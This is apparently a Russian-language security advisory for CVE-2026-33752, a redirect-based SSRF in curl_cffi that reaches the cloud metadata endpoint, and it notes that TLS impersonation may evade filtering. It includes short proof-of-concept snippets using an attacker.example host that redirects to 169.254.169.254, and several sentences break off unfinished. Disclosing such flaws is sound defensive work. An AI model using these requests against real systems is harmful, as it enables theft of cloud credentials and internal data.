
Демонстрирует SSRF-уязвимость на основе перенаправлений в curl_cffi, позволяющую получить доступ к внутренней сети, с PoC-кодом и анализом обхода имитации TLS.
CVE-2026-33752 (SSRF на основе перенаправлений, приводящий к доступу к внутренней сети в curl_cffi)
curl_cffi не ограничивает запросы к внутренним диапазонам IP-адресов и автоматически следует перенаправлениям через базовую библиотеку libcurl.
Из-за этого управляемый атакующим URL-адрес может перенаправлять запросы на внутренние сервисы, такие как конечные точки метаданных облака. Кроме того, функция имитации TLS в curl_cffi может сделать такие запросы похожими на легитимный трафик браузера, что может обойти определённые сетевые средства контроля.
Проблема связана с тем, как curl_cffi обрабатывает исходящие запросы
Это означает, что даже если приложение разрешает запросы только к внешним URL-адресам, атакующий может
В результате внутренние конечные точки (такие как API метаданных облачных экземпляров) могут быть доступны.
Кроме того, curl_cffi поддерживает имитацию отпечатка TLS (например, impersonate="chrome"). В средах, где исходящие запросы фильтруются на основе отпечатка TLS, это может затруднить обнаружение или блокировку таких запросов.
Это поведение аналогично ранее сообщённым проблемам SSRF на основе перенаправлений, таким как CVE-2025-68616, где перенаправления позволяли получить доступ к непредусмотренным внутренним ресурсам.
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
Код жертвы:
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
Результат
import curl_cffi\
resp = curl_cffi.get(
"https://attacker.example/test",
impersonate="chrome")
В некоторых средах это может помочь запросу обойти средства фильтрации на основе TLS.
Атакующий, который может контролировать запрашиваемый URL-адрес, может: